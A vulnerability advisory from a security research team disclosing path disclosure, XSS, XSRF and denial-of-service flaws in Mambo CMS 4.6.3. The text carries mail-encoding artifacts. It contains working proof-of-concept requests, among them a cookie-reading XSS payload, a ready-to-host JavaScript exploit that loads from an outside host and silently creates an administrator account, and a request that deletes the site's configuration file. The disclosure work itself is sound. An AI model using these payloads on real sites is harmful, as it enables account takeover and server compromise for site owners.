Mambo 4.6.3 Path Disclosure, XSS , XSRF, DOS
########################## WwW.BugReport.ir #########################
#
# AmnPardaz Security Research Team
#
# Title: Mambo Vulnerabilities
# Vendor: http://mamboserver.com
# Bugs: Path Disclosure, XSS , XSRF, DOS
# Vulnerable Version:4.6.3 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix Available: No!
################################################################
####################
- Description:
####################
Mambo is an, open source, modular, web content management system =20
(CMS), written in Php with a MySql database in backend.
####################
- Vulnerability:
####################
+--> Path Disclosure
POC: =20
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/file=
manager/connectors/php/connector.php?Command=3DRenameFile
+--> XSS
POC: =20
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/file=
manager/connectors/php/connector.php?Command=3D<script>alert(document.cookie=
)</script>
+--> XSRF (the exploit creates an admin account)
POC:http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/=
filemanager/connectors/php/connector.php?Command=3D<script type=3Dtext/javas=
cript =20
src=3Dhttp://somewhere/test.js></script>
content of http://somewhere/test.js
/*
Set desiered user, pass, email and victims url then upload the script =20
somewhere on the web
*/
window.onload =3D function() {
var url =3D 'http://localhost/MamboV4.6.2/administrator/index2.php';
var gid =3D 25;
var user =3D 'amnpardaz';
var pass =3D 'amnpardaz';
var email =3D 'amnpardaz@none.com';
var param =3D {
name: user,
username: user,
email: email,
password: pass,
password2: pass,
gid: gid,
block: 0,
option: 'com_users',
task: 'save',
sendEmail: 0
};
var form =3D document.createElement('form');
form.action =3D url;
form.method =3D 'post';
form.target =3D 'hidden';
form.style.display =3D 'none';
for (var i in param)
{
=09try
=09{ // ie
=09=09var input =3D document.createElement('<input name=3D"'+i+'">');
=09}
=09catch(e)
=09{ // other browsers
=09=09var input =3D document.createElement('input');
=09=09input.name =3D i;
=09}
=09input.setAttribute('value', param[i]);
=09form.appendChild(input);
}
document.body.appendChild(form);
form.submit();
location.replace(url);
}
+--> DOS
"mostlyce component" Image Manager note from mambo 4.6.3:
Important: In order to utilize the Image Manager functionality you =20
must create the folder structure shown below in your document root =20
folder.
Not your Mambo root, your document root! For this installation your =20
document root is [something].
You can create this structure manually or extract the UserFiles.zip =20
file included with MOStlyCE at that location.
You can find the UserFiles.zip file at /mambots/editors/mostlyce.
If an administrator follows up the above instruction,its possible for =20
a remote attacker to remove any file from the remote server for =20
example the main configuration file, which could result in remote =20
denial of service!
The impact of the vulnerability increases when the administrator =20
doesnt remove "installation" folder (its common to rename it to =20
something predictable such as "_installation"),
in such a condition its possible for a remote attacker to delete =20
configuration.php and install a new version of mambo on the victim =20
server using remote database!
Code Snippet:
/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/Comma=
nds/FileUpload.php
#45-60
function run() {
=09=09//If using CGI Upload script, get file info and insert into $_FILE arr=
ay
=09=09if =09(
=09=09=09=09(sizeof($_FILES)=3D=3D0) &&
=09=09=09=09isset($_GET['file']) &&
=09=09=09=09isset($_GET['file']['NewFile']) &&
=09=09=09=09is_array($_GET['file']['NewFile'])
=09=09=09) {
=09=09=09if =20
(isset($_GET['file']['NewFile']['name'])&&$_GET['file']['NewFile']['size']&&=
$_GET['file']['NewFile']['tmp_name']) =20
{
=09=09=09=09$_FILES['NewFile']['name']=3Dbasename(str_replace("\\","/",$_GET=
['file']['NewFile']['name']));
=09=09=09=09$_FILES['NewFile']['size']=3D$_GET['file']['NewFile']['size'];
=09=09=09=09$_FILES['NewFile']['tmp_name']=3D$_GET['file']['NewFile']['tmp_n=
ame'];
=09=09=09} else {
=09=09=09=09$disp=3D"202,'Incomplete file information from upload CGI'";
=09=09=09}
=09=09}
=09=09.
=09=09.
=09=09.
#163-178
//Upload file
if (is_uploaded_file($_FILES['NewFile']['tmp_name'])) {
if =20
(move_uploaded_file($_FILES['NewFile']['tmp_name'],($this->real_cwd."/$filen=
ame.$ext"))) =20
{
chmod(($this->real_cwd."/$filename.$ext"),0777);
$disp=3D"0";
} else {
$disp=3D"202,'Failed to upload file, internal error...'";
}
} else {
if =20
(rename($_FILES['NewFile']['tmp_name'],($this->real_cwd."/$filename.$ext")))=
=20
{
chmod(($this->real_cwd."/$filename.$ext"),0777);
$disp=3D"0";
} else {
$disp=3D"202,'Failed to upload file, internal error...'";
}
}
..
..
..
POC: =20
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/file=
manager/connectors/php/connector.php?Command=3DFileUpload&file=3Da&file[NewF=
ile][name]=3Dabc.gif&file[NewFile][tmp_name]=3DC:/path/to/MamboV4.6.2/config=
uration.php&file[NewFile][size]=3D1&CurrentFolder=3D
####################
- Credit :
####################
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com
討論串 (同標題文章)